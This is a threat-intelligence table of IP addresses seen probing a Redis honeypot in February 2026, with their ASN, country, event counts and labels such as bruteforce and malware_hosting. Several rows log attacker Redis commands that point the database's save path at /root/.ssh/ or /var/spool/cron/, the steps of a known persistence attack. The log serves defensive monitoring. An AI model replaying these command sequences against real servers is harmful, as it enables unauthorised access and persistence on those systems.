| IPv4 | 137.184.137.160 | Attacker IP • Redis / seen in Redishoneypot; events=20; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-02-06 | |
| IPv4 | 172.174.165.226 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmds=CONFIG SET dbfilename dump.rdb,CONFIG SET dir /data,CONFIG SET dir /var/spool/cron/,CONFIG SET dir /root/.ssh/,CONFIG GET dbfilename; redis_cmd_hits=0; cmd="CONFIG SET dir /data" | malware_hosting | 2026-02-06 | |
| IPv4 | 198.199.83.81 | Attacker IP • Redis / seen in Redishoneypot; events=17; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-02-06 | |
| IPv4 | 203.190.9.170 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=BD; asn=58768; asn_org=Daffodil Online Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-06 | |
| IPv4 | 47.251.13.59 | Attacker IP • Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=45102; asn_org=Alibaba US Technology Co., Ltd.; redis_cmd_hits=0 | bruteforce | 2026-02-06 | |
| IPv4 | 52.159.245.160 | Attacker IP • Redis / seen in Redishoneypot; events=16; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmds=CONFIG GET dir,CONFIG GET dbfilename,CONFIG SET dir /root/.ssh/,CONFIG SET dir /data,CONFIG SET dir /var/spool/cron/; redis_cmd_hits=0; cmd="CONFIG SET dir /data" | malware_hosting | 2026-02-07 | |
| IPv4 | 20.235.199.173 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=IN; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-07 | |
| IPv4 | 120.48.43.118 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=38365; asn_org=Beijing Baidu Netcom Science and Technology Co., Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-07 | |
| IPv4 | 142.93.13.102 | Attacker IP • Redis / seen in Redishoneypot; events=19; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-02-07 | |
| IPv4 | 18.190.15.50 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-07 | |
| IPv4 | 20.87.192.175 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=ZA; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | scanning_host | 2026-02-07 | |
| IPv4 | 123.178.210.86 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; redis_cmd_hits=0 | bruteforce | 2026-02-07 | |
| IPv4 | 171.118.66.239 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; redis_cmd_hits=0 | scanning_host | 2026-02-07 | |
| IPv4 | 172.105.177.106 | Attacker IP • Redis / seen in Redishoneypot; events=8; ports=6379; cc=AU; asn=63949; asn_org=Akamai Connected Cloud; cats=Misc activity; redis_cmd_hits=0 | bruteforce | 2026-02-07 | |
| IPv4 | 198.235.24.236 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-07 | |
| IPv4 | 106.15.238.36 | Attacker IP • Redis / seen in Redishoneypot; events=24; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | bruteforce | 2026-02-07 | |
| IPv4 | 182.92.181.218 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-07 | |
| IPv4 | 100.29.192.113 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-07 | |
| IPv4 | 217.154.14.209 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=FR; asn=8560; asn_org=IONOS SE; redis_cmd_hits=0 | scanning_host | 2026-02-07 | |
| IPv4 | 44.220.185.126 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-07 | |
| IPv4 | 47.92.97.77 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-07 | |
| IPv4 | 64.62.156.108 | Attacker IP • Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | bruteforce | 2026-02-07 | |
| IPv4 | 64.62.156.109 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | scanning_host | 2026-02-07 | |
| IPv4 | 152.32.206.181 | Attacker IP • Redis / seen in Redishoneypot; events=58; ports=6379; cc=US; asn=135377; asn_org=UCLOUD INFORMATION TECHNOLOGY HK LIMITED; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-07 | |
| IPv4 | 43.143.117.66 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=45090; asn_org=Shenzhen Tencent Computer Systems Company Limited; redis_cmd_hits=0 | scanning_host | 2026-02-07 | |
| IPv4 | 139.198.30.179 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=59078; asn_org=Yunify Technologies Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-07 | |
| IPv4 | 182.43.64.3 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=58519; asn_org=Cloud Computing Corporation; redis_cmd_hits=0 | scanning_host | 2026-02-07 | |
| IPv4 | 40.124.175.29 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-07 | |
| IPv4 | 50.232.194.66 | Attacker IP • Redis / seen in Redishoneypot; events=10; ports=6379; cc=US; asn=7922; asn_org=Comcast Cable Communications, LLC; redis_cmd_hits=0 | bruteforce | 2026-02-07 | |
| IPv4 | 18.191.106.209 | Attacker IP • Redis / seen in Redishoneypot; events=99; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; cats=Generic Protocol Command Decode,Misc activity; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0; cmd="...L...'7.M..... /U.......curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group" | bruteforce | 2026-02-07 | |
| IPv4 | 18.191.52.107 | Attacker IP • Redis / seen in Redishoneypot; events=97; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; cats=Generic Protocol Command Decode,Misc activity; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0; cmd="SSH-2.0-Go " | bruteforce | 2026-02-07 | |
| IPv4 | 206.168.34.58 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-07 | |
| IPv4 | 3.135.20.78 | Attacker IP • Redis / seen in Redishoneypot; events=101; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; cats=Generic Protocol Command Decode,Misc activity; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0; cmd="...L..&JW!...l...na.~.....curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group" | bruteforce | 2026-02-07 | |
| IPv4 | 106.13.45.232 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=38365; asn_org=Beijing Baidu Netcom Science and Technology Co., Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-07 | |
| IPv4 | 8.219.130.196 | Attacker IP • Redis / seen in Redishoneypot; events=38; ports=6379; cc=SG; asn=45102; asn_org=Alibaba US Technology Co., Ltd.; cats=Misc activity; redis_cmds=config set dir .,config set rdbcompression no,config set dir /root/.ssh/,save,MODULE UNLOAD system; redis_cmd_hits=0; cmd="SLAVEOF NO ONE" | command_and_control | 2026-02-07 | |
| IPv4 | 198.235.24.127 | Attacker IP • Redis / seen in Redishoneypot; events=8; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-07 | |
| IPv4 | 14.103.198.15 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4811; asn_org=China Telecom Group; redis_cmd_hits=0 | scanning_host | 2026-02-07 | |
| IPv4 | 162.142.125.36 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-07 | |
| IPv4 | 167.94.138.152 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-07 | |
| IPv4 | 20.171.125.128 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmds=CONFIG SET dbfilename dump.rdb,CONFIG SET dir /data,CONFIG SET dir /root/.ssh/,CONFIG GET dbfilename,CONFIG GET dir; redis_cmd_hits=0; cmd="CONFIG SET dir /data" | malware_hosting | 2026-02-07 | |
| IPv4 | 203.55.131.5 | Attacker IP • Redis / seen in Redishoneypot; events=18; ports=6379; cc=US; asn=32475; asn_org=Internap Holding LLC; redis_cmd_hits=0 | bruteforce | 2026-02-07 | |
| IPv4 | 38.47.67.31 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=ID; asn=59134; asn_org=PT. Datacomm Diangraha; redis_cmd_hits=0 | scanning_host | 2026-02-07 | |
| IPv4 | 176.32.195.85 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=AM; asn=197834; asn_org=Ucom CJSC; cats=Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.0; redis_cmd_hits=0 | bruteforce | 2026-02-07 | |
| IPv4 | 20.65.195.28 | Attacker IP • Redis / seen in Redishoneypot; events=23; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-07 | |
| IPv4 | 99.199.115.123 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CA; asn=852; asn_org=TELUS Communications; redis_cmd_hits=0 | bruteforce | 2026-02-07 | |
| IPv4 | 101.201.71.213 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-08 | |
| IPv4 | 104.209.11.210 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmds=CONFIG SET dir /var/spool/cron/,CONFIG SET dir /data,CONFIG GET dir,CONFIG GET dbfilename,CONFIG SET dir /root/.ssh/; redis_cmd_hits=0; cmd="CONFIG SET dir /data" | malware_hosting | 2026-02-08 | |
| IPv4 | 3.151.116.231 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-08 | |
| IPv4 | 186.64.123.211 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CL; asn=52368; asn_org=ZAM LTDA.; redis_cmd_hits=0 | scanning_host | 2026-02-08 | |
| IPv4 | 47.96.228.248 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | bruteforce | 2026-02-08 | |
| IPv4 | 125.74.55.217 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=141998; asn_org=China Telecom; redis_cmd_hits=0 | bruteforce | 2026-02-08 | |
| IPv4 | 141.98.10.196 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=LT; asn=209605; asn_org=UAB Host Baltic; redis_cmd_hits=0 | scanning_host | 2026-02-08 | |
| IPv4 | 220.181.1.163 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=23724; asn_org=IDC, China Telecommunications Corporation; redis_cmd_hits=0 | scanning_host | 2026-02-08 | |
| IPv4 | 37.60.241.154 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=FR; asn=51167; asn_org=Contabo GmbH; cats=Generic Protocol Command Decode,Misc activity; redis_cmd_hits=0; cmd="SSH-2.0-OpenSSH " | bruteforce | 2026-02-08 | |
| IPv4 | 36.111.158.225 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=134768; asn_org=CHINANET SHAANXI province Cloud Base network; redis_cmd_hits=0 | scanning_host | 2026-02-08 | |
| IPv4 | 180.188.47.6 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=133775; asn_org=Xiamen; redis_cmd_hits=0 | scanning_host | 2026-02-08 | |
| IPv4 | 80.82.70.133 | Attacker IP • Redis / seen in Redishoneypot; events=14; ports=6379; cc=SC; asn=202425; asn_org=IP Volume inc; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-08 | |
| IPv4 | 94.102.49.155 | Attacker IP • Redis / seen in Redishoneypot; events=18; ports=6379; cc=NL; asn=202425; asn_org=IP Volume inc; redis_cmd_hits=0 | bruteforce | 2026-02-08 | |
| IPv4 | 46.197.75.139 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=TR; asn=47524; asn_org=Turksat Uydu Haberlesme ve Kablo TV Isletme A.S.; redis_cmd_hits=0 | scanning_host | 2026-02-08 | |
| IPv4 | 104.237.156.209 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0 | scanning_host | 2026-02-08 | |
| IPv4 | 65.49.1.142 | Attacker IP • Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | bruteforce | 2026-02-08 | |
| IPv4 | 65.49.1.148 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | scanning_host | 2026-02-08 | |
| IPv4 | 3.14.72.188 | Attacker IP • Redis / seen in Redishoneypot; events=82; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; cats=Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-02-08 | |
| IPv4 | 185.107.80.93 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=FR; asn=43350; asn_org=NForce Entertainment B.V.; redis_cmd_hits=0 | scanning_host | 2026-02-08 | |
| IPv4 | 135.237.125.23 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-08 | |
| IPv4 | 68.183.197.131 | Attacker IP • Redis / seen in Redishoneypot; events=7; ports=6379; cc=CA; asn=14061; asn_org=DigitalOcean, LLC; cats=Generic Protocol Command Decode,Not Suspicious Traffic; redis_cmd_hits=0 | bruteforce | 2026-02-08 | |
| IPv4 | 8.153.205.90 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-08 | |
| IPv4 | 111.230.36.157 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=45090; asn_org=Shenzhen Tencent Computer Systems Company Limited; redis_cmd_hits=0 | scanning_host | 2026-02-08 | |
| IPv4 | 20.51.206.80 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmds=CONFIG GET dbfilename,CONFIG SET dir /root/.ssh/,CONFIG SET dir /var/lib/redis,CONFIG GET dir,CONFIG SET dir /var/spool/cron/; redis_cmd_hits=0; cmd="CONFIG SET dir /var/lib/redis" | malware_hosting | 2026-02-08 | |
| IPv4 | 162.142.125.122 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-08 | |
| IPv4 | 20.15.162.87 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-08 | |
| IPv4 | 205.210.31.56 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-08 | |
| IPv4 | 193.163.125.87 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=GB; asn=211298; asn_org=Driftnet Ltd; redis_cmd_hits=0 | scanning_host | 2026-02-08 | |
| IPv4 | 198.211.96.215 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-02-09 | |
| IPv4 | 121.196.225.181 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-09 | |
| IPv4 | 3.131.24.55 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-09 | |
| IPv4 | 120.48.15.210 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=38365; asn_org=Beijing Baidu Netcom Science and Technology Co., Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-09 | |
| IPv4 | 18.222.199.88 | Attacker IP • Redis / seen in Redishoneypot; events=96; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; cats=Generic Protocol Command Decode,Misc activity; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0; cmd="SSH-2.0-Go " | bruteforce | 2026-02-09 | |
| IPv4 | 162.142.125.91 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-09 | |
| IPv4 | 206.168.34.117 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-09 | |
| IPv4 | 47.94.213.192 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-09 | |
| IPv4 | 64.62.197.62 | Attacker IP • Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | bruteforce | 2026-02-09 | |
| IPv4 | 64.62.197.65 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | scanning_host | 2026-02-09 | |
| IPv4 | 216.180.246.50 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=396982; asn_org=Google LLC; redis_cmd_hits=0 | scanning_host | 2026-02-09 | |
| IPv4 | 172.236.117.243 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=63949; asn_org=Akamai Connected Cloud; redis_cmd_hits=0 | scanning_host | 2026-02-09 | |
| IPv4 | 43.134.0.85 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=SG; asn=132203; asn_org=Tencent Building, Kejizhongyi Avenue; redis_cmd_hits=0 | bruteforce | 2026-02-09 | |
| IPv4 | 134.199.219.142 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-02-09 | |
| IPv4 | 221.130.29.85 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=56046; asn_org=China Mobile communications corporation; redis_cmd_hits=0 | bruteforce | 2026-02-09 | |
| IPv4 | 161.35.63.93 | Attacker IP • Redis / seen in Redishoneypot; events=21; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-02-09 | |
| IPv4 | 165.22.187.195 | Attacker IP • Redis / seen in Redishoneypot; events=17; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-02-09 | |
| IPv4 | 40.79.247.66 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmds=CONFIG GET dbfilename,CONFIG SET dbfilename dump.rdb,CONFIG SET dir /data,CONFIG SET dir /root/.ssh/,CONFIG GET dir; redis_cmd_hits=0; cmd="CONFIG SET dir /data" | malware_hosting | 2026-02-09 | |
| IPv4 | 167.248.133.114 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-09 | |
| IPv4 | 183.56.243.176 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=CN; asn=135089; asn_org=China Telecom; redis_cmd_hits=0 | bruteforce | 2026-02-09 | |
| IPv4 | 20.65.193.191 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-10 | |
| IPv4 | 206.168.34.118 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-10 | |
| IPv4 | 66.132.153.149 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-10 | |
| IPv4 | 143.198.117.126 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-02-10 | |
| IPv4 | 64.52.80.240 | Attacker IP • Redis / seen in Redishoneypot; events=46; ports=6379; cc=US; asn=399629; asn_org=BL Networks; cats=Generic Protocol Command Decode; redis_cmds=EVAL return 'Lua scripting enabled' 0; redis_cmd_hits=0; cmd="EVAL return 'Lua scripting enabled' 0" | malware_hosting | 2026-02-10 | |
| IPv4 | 106.15.64.156 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0 | scanning_host | 2026-02-10 | |
| IPv4 | 18.221.179.104 | Attacker IP • Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-10 | |
| IPv4 | 81.29.142.100 | Attacker IP • Redis / seen in Redishoneypot; events=18; ports=6379; cc=RU; asn=210259; asn_org=LLC Applied Computational Technologies; redis_cmd_hits=0 | bruteforce | 2026-02-10 | |
| IPv4 | 81.29.142.50 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=RU; asn=210259; asn_org=LLC Applied Computational Technologies; redis_cmd_hits=0 | scanning_host | 2026-02-10 | |
| IPv4 | 198.235.24.249 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0 | bruteforce | 2026-02-10 | |
| IPv4 | 180.232.31.146 | Attacker IP • Redis / seen in Redishoneypot; events=9; ports=6379; cc=PH; asn=9658; asn_org=Eastern Telecoms Phils., Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-10 | |
| IPv4 | 20.171.32.24 | Attacker IP • Redis / seen in Redishoneypot; events=16; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-10 | |
| IPv4 | 3.131.220.121 | Attacker IP • Redis / seen in Redishoneypot; events=104; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; cats=Generic Protocol Command Decode,Misc activity; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0; cmd="SSH-2.0-Go " | bruteforce | 2026-02-10 | |
| IPv4 | 176.53.85.149 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=TR; asn=42926; asn_org=Radore Veri Merkezi Hizmetleri A.S.; redis_cmd_hits=0 | scanning_host | 2026-02-10 | |
| IPv4 | 185.242.226.43 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=202425; asn_org=IP Volume inc; redis_cmd_hits=0 | scanning_host | 2026-02-10 | |
| IPv4 | 18.219.37.54 | Attacker IP • Redis / seen in Redishoneypot; events=8; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; cats=Misc activity; redis_cmd_hits=0 | bruteforce | 2026-02-10 | |
| IPv4 | 184.105.139.117 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | scanning_host | 2026-02-10 | |
| IPv4 | 184.105.139.69 | Attacker IP • Redis / seen in Redishoneypot; events=26; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0 | bruteforce | 2026-02-10 | |
| IPv4 | 192.241.130.247 | Attacker IP • Redis / seen in Redishoneypot; events=20; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | bruteforce | 2026-02-10 | |
| IPv4 | 98.89.204.118 | Attacker IP • Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=14618; asn_org=Amazon.com, Inc.; redis_cmd_hits=0 | scanning_host | 2026-02-10 | |
| IPv4 | 146.190.217.25 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0 | scanning_host | 2026-02-10 | |
| IPv4 | 95.215.0.144 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=RU; asn=34665; asn_org=Petersburg Internet Network ltd.; cats=Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.0; redis_cmd_hits=0 | bruteforce | 2026-02-10 | |
| IPv4 | 172.178.117.213 | Attacker IP • Redis / seen in Redishoneypot; events=16; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmds=CONFIG GET dbfilename,CONFIG GET dir,CONFIG SET dbfilename dump.rdb,CONFIG SET dir /var/spool/cron/,CONFIG SET dir /var/lib/redis; redis_cmd_hits=0; cmd="CONFIG SET dir /var/lib/redis" | malware_hosting | 2026-02-10 | |
| IPv4 | 20.169.74.16 | Attacker IP • Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmds=CONFIG SET dir /data,CONFIG GET dbfilename,CONFIG SET dbfilename dump.rdb,CONFIG SET dir /var/spool/cron/,CONFIG GET dir; redis_cmd_hits=0; cmd="CONFIG SET dir /data" | malware_hosting | 2026-02-11 | |
| IPv4 | 135.237.125.135 | Attacker IP • Redis / seen in Redishoneypot; events=24; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0 | bruteforce | 2026-02-11 | |
| IPv4 | 119.29.249.147 | Attacker IP • Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=45090; asn_org=Shenzhen Tencent Computer Systems Company Limited; redis_cmd_hits=0 | scanning_host | 2026-02-11 | |
| IPv4 | 167.94.138.51 | Attacker IP • Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0 | bruteforce | 2026-02-11 | |
| IPv4 | 129.212.188.167 | Attacker IP • Redis / seen in Redishoneypot; events=21; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0 | bruteforce | 2026-02-11 | |
